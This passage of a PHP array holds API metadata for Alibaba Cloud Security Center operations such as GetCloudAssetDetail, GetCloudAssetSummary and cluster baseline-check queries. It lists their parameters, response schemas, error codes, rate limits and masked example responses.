service provider of the cloud asset. Valid values:'."\n" ."\n" .'* **0**: Alibaba Cloud.'."\n" .'* **1**: service provider that is unrecognized.'."\n" .'* **2**: data center.'."\n" .'* **3**, **4**, **5**, and **7**: third-party service provider.'."\n" .'* **8**: simple application server.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud asset. Valid values:'."\n" ."\n" .'* **0**: ECS.'."\n" .'* **1**: SLB.'."\n" .'* **3**: ApsaraDB RDS.'."\n" .'* **4**: ApsaraDB for MongoDB.'."\n" .'* **5**: ApsaraDB for Redis.'."\n" .'* **6**: Container Registry.'."\n" .'* **8**: Container Service for Kubernetes.'."\n" .'* **9**: VPC.'."\n" .'* **11**: ActionTrail.'."\n" .'* **12**: CDN.'."\n" .'* **13**: Certificate Management Service.'."\n" .'* **14**: Apsara Devops.'."\n" .'* **15**: RAM.'."\n" .'* **16**: Anti-DDoS.'."\n" .'* **17**: WAF.'."\n" .'* **18**: OSS.'."\n" .'* **19**: PolarDB.'."\n" .'* **20**: ApsaraDB RDS for PostgreSQL.'."\n" .'* **21**: MSE.'."\n" .'* **22**: NAS.'."\n" .'* **23**: DSC.'."\n" .'* **24**: EIP.'."\n" .'* **25**: IDaaS-EIAM.'."\n" .'* **26**: PolarDB-X.'."\n" .'* **27**: Elasticsearch.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud asset.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the cloud asset.'."\n", 'type' => 'string', 'example' => 'rm-uf6t6u05n6g48****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the cloud asset.'."\n", 'type' => 'string', 'example' => 'yztest-l***', 'title' => ''], 'CreatedTime' => ['description' => 'The time when the instance was created. The value is a timestamp.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1607365213000', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the instance.'."\n", 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'AlarmStatus' => ['description' => 'Indicates whether alerts are generated for the current cloud asset. Valid values:'."\n" ."\n" .'* **YES**'."\n" .'* **NO**'."\n", 'type' => 'string', 'example' => 'NO', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether risks are detected on the current cloud asset. Valid values:'."\n" ."\n" .'* **YES**'."\n" .'* **NO**'."\n", 'type' => 'string', 'example' => 'NO', 'title' => ''], 'AssetTypeName' => ['description' => 'The name of the cloud asset type.'."\n", 'type' => 'string', 'example' => 'RDS', 'title' => ''], 'AssetSubTypeName' => ['description' => 'The name of the cloud asset subtype.'."\n", 'type' => 'string', 'example' => 'INSTANCE', 'title' => ''], 'SecurityInfo' => ['description' => 'The security information about the cloud asset.'."\n", 'type' => 'string', 'example' => '{\\"seriousNum\\":0,\\"appNum\\":0,\\"baselineMedium\\":0,\\"remindNum\\":0,\\"imageVulNntf\\":0,\\"cveNum\\":0,\\"vul\\":0,\\"uuid\\":\\"rm-uf6t6u05n6g485o70\\",\\"emgNum\\":0,\\"weakPWNum\\":0,\\"imageMaliciousFileRemind\\":0,\\"imageBaselineMedium\\":0,\\"laterVulCount\\":0,\\"cmsNum\\":0,\\"imageMaliciousFileSerious\\":0,\\"agentlessMalicious\\":0,\\"suspNum\\":0,\\"imageBaselineHigh\\":0,\\"asapVulCount\\":0,\\"imageVulLater\\":0,\\"agentlessAll\\":0,\\"sysNum\\":0,\\"containerLater\\":0,\\"containerSuspicious\\":0,\\"imageBaselineNum\\":0,\\"newSuspicious\\":0,\\"nntfVulCount\\":0,\\"scaNum\\":0,\\"containerNntf\\":0,\\"health\\":0,\\"trojan\\":0,\\"suspicious\\":0,\\"imageMaliciousFileSuspicious\\":0,\\"containerRemind\\":0,\\"baselineLow\\":0,\\"imageVulAsap\\":0,\\"imageBaselineLow\\":0,\\"containerAsap\\":0,\\"agentlessBaseline\\":0,\\"agentlessVulSca\\":0,\\"agentlessVulCve\\":0,\\"containerSerious\\":0,\\"baselineHigh\\":0,\\"account\\":0,\\"baselineNum\\":6}', 'title' => ''], 'DetailLink' => ['description' => 'The detailed address of the cloud asset.'."\n", 'type' => 'string', 'example' => 'https://rdsnext.console.aliyun.com/detail/rm-uf6t6u05n6g48****/basicInfo?region=cn-shanghai', 'title' => ''], 'VendorUid' => ['description' => 'Account id for multi-cloud instances.', 'type' => 'string', 'example' => '123', 'title' => ''], 'VendorUserName' => ['description' => 'The account name of the multi-cloud instance.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'OriginalAssetInfo' => ['description' => 'Detailed asset information.', 'type' => 'string', 'example' => '{"owner":{"displayName":"123","id":"123"},"intranetEndpoint":"oss-cn-shanghai-internal.aliyuncs.com","extranetEndpoint":"oss-cn-shanghai.aliyuncs.com","storageClass":"Standard","name":"test","location":"oss-cn-shanghai","creationDate":1629882579000,"region":"cn-shanghai"}', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of instances in the list of cloud assets returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'GetCloudAssetDetail', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCloudAssetDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCloudAssetDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CB45CAED-31C3-517A-8619-10F632D3****\\",\\n \\"Instances\\": [\\n {\\n \\"RegionId\\": \\"cn-hanghzou\\",\\n \\"Vendor\\": 0,\\n \\"AssetType\\": 3,\\n \\"AssetSubType\\": 0,\\n \\"InstanceId\\": \\"rm-uf6t6u05n6g48****\\",\\n \\"InstanceName\\": \\"yztest-l***\\",\\n \\"CreatedTime\\": 1607365213000,\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"AlarmStatus\\": \\"NO\\",\\n \\"RiskStatus\\": \\"NO\\",\\n \\"AssetTypeName\\": \\"RDS\\",\\n \\"AssetSubTypeName\\": \\"INSTANCE\\",\\n \\"SecurityInfo\\": \\"{\\\\\\\\\\\\\\"seriousNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"appNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineMedium\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"remindNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulNntf\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"cveNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"vul\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"uuid\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"rm-uf6t6u05n6g485o70\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"emgNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"weakPWNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileRemind\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineMedium\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"laterVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"cmsNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileSerious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessMalicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"suspNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineHigh\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"asapVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulLater\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessAll\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"sysNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerLater\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"newSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"nntfVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"scaNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerNntf\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"health\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"trojan\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"suspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerRemind\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineLow\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulAsap\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineLow\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerAsap\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessBaseline\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulSca\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulCve\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerSerious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineHigh\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"account\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineNum\\\\\\\\\\\\\\":6}\\",\\n \\"DetailLink\\": \\"https://rdsnext.console.aliyun.com/detail/rm-uf6t6u05n6g48****/basicInfo?region=cn-shanghai\\",\\n \\"VendorUid\\": \\"123\\",\\n \\"VendorUserName\\": \\"test\\",\\n \\"OriginalAssetInfo\\": \\"{\\\\\\"owner\\\\\\":{\\\\\\"displayName\\\\\\":\\\\\\"123\\\\\\",\\\\\\"id\\\\\\":\\\\\\"123\\\\\\"},\\\\\\"intranetEndpoint\\\\\\":\\\\\\"oss-cn-shanghai-internal.aliyuncs.com\\\\\\",\\\\\\"extranetEndpoint\\\\\\":\\\\\\"oss-cn-shanghai.aliyuncs.com\\\\\\",\\\\\\"storageClass\\\\\\":\\\\\\"Standard\\\\\\",\\\\\\"name\\\\\\":\\\\\\"test\\\\\\",\\\\\\"location\\\\\\":\\\\\\"oss-cn-shanghai\\\\\\",\\\\\\"creationDate\\\\\\":1629882579000,\\\\\\"region\\\\\\":\\\\\\"cn-shanghai\\\\\\"}\\"\\n }\\n ],\\n \\"Count\\": 1\\n}","type":"json"}]', ], 'GetCloudAssetSummary' => [ 'summary' => 'Retrieves the summary of cloud assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'Vendors', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of cloud vendors to query.', 'type' => 'array', 'items' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: non-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: third-party cloud asset'."\n" .'- **8**: lightweight asset', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'CloudAssetTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of asset type information for cloud assets.', 'type' => 'array', 'items' => [ 'description' => 'The list of asset type information for cloud assets.', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: non-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: third-party cloud asset'."\n" .'- **8**: lightweight asset', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'- **0**: Elastic Compute Service (ECS) server'."\n" .'- **1**: load balancing'."\n" .'- **3**: ApsaraDB RDS database'."\n" .'- **4**: ApsaraDB for MongoDB database'."\n" .'- **5**: Tair (Redis® OSS-Compatible) database'."\n" .'- **6**: Container Registry'."\n" .'- **8**: Container Service for Kubernetes (ACK)'."\n" .'- **9**: Virtual Private Cloud (VPC)'."\n" .'- **11**: ActionTrail'."\n" .'- **12**: CDN'."\n" .'- **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .'- **14**: Apsara Devops'."\n" .'- **16**: Anti-DDoS'."\n" .'- **17**: Web Application Firewall (WAF)'."\n" .'- **18**: Object Storage Service (OSS)'."\n" .'- **19**: cloud-native relational database PolarDB'."\n" .'- **20**: ApsaraDB RDS for PostgreSQL database'."\n" .'- **21**: Microservices Engine (MSE)'."\n" .'- **22**: Apsara File Storage NAS'."\n" .'- **23**: Data Security Center (DSC)'."\n" .'- **24**: Elastic IP Address (EIP)'."\n" .'- **25**: Alibaba Cloud IDaaS EIAM'."\n" .'- **26**: PolarDB-X'."\n" .'- **27**: Elasticsearch', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '4', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service. The value is in the format of asset type - subtype. Valid values:'."\n" ."\n" .'- **0**: Elastic Compute Service (ECS) server'."\n" .' * **1**: cloud disk (storage)'."\n" .' * **2**: security group'."\n" .' * **100**: instance'."\n" .'- **1**: load balancing'."\n" .' * **0**: load balancing'."\n" .' * **1**: Application Load Balancer (ALB)'."\n" .'- **3**: ApsaraDB RDS database'."\n" .' * **0**: instance'."\n" .'- **4**: ApsaraDB for MongoDB database'."\n" .' * **0**: instance'."\n" .'- **5**: Tair (Redis® OSS-Compatible) database'."\n" .' * **0**: instance'."\n" .'- **6**: Container Registry'."\n" .' * **1**: Enterprise Edition'."\n" .' * **2**: Personal Edition'."\n" .'- **8**: Container Service for Kubernetes (ACK)'."\n" .' * **0**: cluster'."\n" .'- **9**: Virtual Private Cloud (VPC)'."\n" .' * **0**: NAT gateway'."\n" .' * **1**: EIP'."\n" .' * **2**: VPN'."\n" .' * **3**: FLOW_LOG'."\n" .'- **11**: ActionTrail'."\n" .' * **0**: trail'."\n" .'- **12**: CDN'."\n" .' * **0**: instance'."\n" .'- **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .' * **0**: certificate'."\n" .'- **14**: Apsara Devops'."\n" .' * **0**: organization'."\n" .'- **16**: Anti-DDoS'."\n" .' * **0**: instance'."\n" .'- **17**: Web Application Firewall (WAF)'."\n" .' * **0**: domain name'."\n" .'- **18**: Object Storage Service (OSS)'."\n" .' * **0**: Bucket'."\n" .'- **19**: cloud-native relational database PolarDB'."\n" .' * **0**: cluster'."\n" .'- **20**: ApsaraDB RDS for PostgreSQL database'."\n" .' * **0**: instance'."\n" .'- **21**: Microservices Engine (MSE)'."\n" .' * **0**: cluster'."\n" .'- **22**: Apsara File Storage NAS'."\n" .' * **0**: file system'."\n" .'- **23**: Data Security Center (DSC)'."\n" .' * **0**: instance'."\n" .'- **24**: Elastic IP Address (EIP)'."\n" .' * **0**: Anycast EIP'."\n" .'- **25**: Alibaba Cloud IDaaS EIAM'."\n" .' * **0**: instance'."\n" .'- **26**: PolarDB-X'."\n" .' * **0**: instance'."\n" .'- **27**: Elasticsearch'."\n" .' * **0**: instance', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'IsSaleData', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to return sale-related data. Valid values:'."\n" .'- **true**: Returns sale-related data.'."\n" .'- **false**: Does not return sale-related data.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F5CF78A7-30AA-59DB-847F-13EE3AE7****', 'title' => ''], 'GroupedFields' => [ 'description' => 'The cloud asset summary information.', 'type' => 'object', 'properties' => [ 'CloudAssetSummaryMetas' => [ 'description' => 'The list of cloud service statistics information.', 'type' => 'array', 'items' => [ 'description' => 'The statistics information of the cloud service.', 'type' => 'object', 'properties' => [ 'AssetType' => ['description' => 'The type of the cloud service. Valid values:'."\n" ."\n" .'- **0**: Elastic Compute Service (ECS) server'."\n" .'- **1**: load balancing'."\n" .'- **3**: ApsaraDB RDS database'."\n" .'- **4**: ApsaraDB for MongoDB database'."\n" .'- **5**: Tair (Redis® OSS-Compatible) database'."\n" .'- **6**: Container Registry'."\n" .'- **8**: Container Service for Kubernetes (ACK)'."\n" .'- **9**: Virtual Private Cloud (VPC)'."\n" .'- **11**: ActionTrail'."\n" .'- **12**: CDN'."\n" .'- **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .'- **14**: Apsara Devops'."\n" .'- **15**: Resource Access Management (RAM)'."\n" .'- **16**: Anti-DDoS'."\n" .'- **17**: Web Application Firewall (WAF)'."\n" .'- **18**: Object Storage Service (OSS)'."\n" .'- **19**: cloud-native relational database PolarDB'."\n" .'- **20**: ApsaraDB RDS for PostgreSQL database'."\n" .'- **21**: Microservices Engine (MSE)'."\n" .'- **22**: Apsara File Storage NAS'."\n" .'- **23**: Data Security Center (DSC)'."\n" .'- **24**: Elastic IP Address (EIP)'."\n" .'- **25**: Alibaba Cloud IDaaS EIAM'."\n" .'- **26**: PolarDB-X'."\n" .'- **27**: Elasticsearch', 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InstanceCount' => ['description' => 'The total number of instances of this cloud service type.', 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], 'InstanceRiskCount' => ['description' => 'The total number of at-risk instances of this cloud service type.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'Vendor' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: non-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: third-party cloud asset'."\n" .'- **8**: lightweight asset', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'InstanceSaleCount' => ['description' => 'The number of assets billed by instance.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'IsInstanceSale' => ['description' => 'Indicates whether the asset is billed by instance. Valid values:'."\n" .'- **true**: Billed by instance.'."\n" .'- **false**: Not billed by instance.', 'type' => 'boolean', 'title' => '', 'example' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'InstanceCountTotal' => ['description' => 'The total number of cloud service instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '919', 'title' => ''], 'InstanceRiskCountTotal' => ['description' => 'The total number of at-risk cloud service instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '544', 'title' => ''], 'InstanceSaleCountTotal' => ['description' => 'The total number of cloud services billed by instance.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F5CF78A7-30AA-59DB-847F-13EE3AE7****\\",\\n \\"GroupedFields\\": {\\n \\"CloudAssetSummaryMetas\\": [\\n {\\n \\"AssetType\\": 16,\\n \\"AssetSubType\\": 0,\\n \\"InstanceCount\\": 16,\\n \\"InstanceRiskCount\\": 5,\\n \\"Vendor\\": 3,\\n \\"InstanceSaleCount\\": 1,\\n \\"IsInstanceSale\\": false\\n }\\n ],\\n \\"InstanceCountTotal\\": 919,\\n \\"InstanceRiskCountTotal\\": 544,\\n \\"InstanceSaleCountTotal\\": 10\\n }\\n}","type":"json"}]', 'title' => 'Retrieve cloud asset summary', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCloudAssetSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], ], 'GetClusterCheckItemWarningStatistics' => [ 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster that you want to query.'."\n" .'> Call the [DescribeGroupedContainerInstances](~~182997~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'cd49575861a3044d49c954e4b3911****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'ae1527a9-2308-46ab-b10a-48ae7ff7****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The baseline check statistics grouped by risk level (high, medium, and low).', 'type' => 'object', 'properties' => [ 'LowWarningCount' => ['title' => '', 'description' => 'The number of low-risk check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'MediumWarningCount' => ['title' => '', 'description' => 'The number of medium-risk check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '2'], 'HighWarningCount' => ['title' => '', 'description' => 'The number of high-risk check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '3'], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C2B285A3-3493-5C5F-A224-4CCE4BFC****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve baseline check issue count for a container cluster', 'summary' => 'Retrieves the number of baseline check issues for a container cluster.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterCheckItemWarningStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetClusterCheckItemWarningStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"LowWarningCount\\": 1,\\n \\"MediumWarningCount\\": 2,\\n \\"HighWarningCount\\": 3\\n },\\n \\"RequestId\\": \\"C2B285A3-3493-5C5F-A224-4CCE4BFC****\\"\\n}","type":"json"}]', ], 'GetClusterCheckSummary' => [ 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster to query.', 'type' => 'string', 'required' => true, 'example' => 'c3aaf6c8085f84791882eef200cd2****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038'], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'NotPassHighCount' => ['description' => 'The number of check items with a high-risk level that failed the check.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassMediumCount' => ['description' => 'The number of check items with a medium-risk level that failed the check.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'NotPassLowCount' => ['description' => 'The number of check items with a low-risk level that failed the check.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'NotPassCount' => ['description' => 'The total number of check items that failed the check.', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query cluster check item risk count', 'summary' => 'Queries the risk statistics of check items for a cluster.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetClusterCheckSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"Data\\": {\\n \\"NotPassHighCount\\": 1,\\n \\"NotPassMediumCount\\": 2,\\n \\"NotPassLowCount\\": 3,\\n \\"NotPassCount\\": 6\\n }\\n}","type":"json"}]', ], 'GetClusterRuleSummary' => [ 'summary' => 'Queries the overall information about cluster defense rules that are configured for the container firewall feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of container clusters.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cc49d88d1exxx', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '291B49F9-xxx', 'title' => ''], 'ClusterRuleSummary' => [ 'description' => 'The overall information about the cluster defense rules.'."\n", 'type' => 'object', 'properties' => [ 'InterceptionSwitch' => ['description' => 'The status of the container firewall feature. Valid values:'."\n" ."\n" .'* **0**: disabled'."\n" .'* **1**: enabled'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'CloseRuleCount' => ['description' => 'The number of disabled cluster defense rules.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InterceptionType' => ['description' => 'The interception mode.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RuleCount' => ['description' => 'The total number of configured cluster defense rules.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'OpenRuleCount' => ['description' => 'The number of enabled cluster defense rules.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SuggestRuleCount' => ['description' => 'The number of recommended cluster defense rules.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InterceptionCount7Day' => ['description' => 'The number of alerts that are triggered by the cluster defense rules in the last seven days.'."\n", 'type' => 'integer', 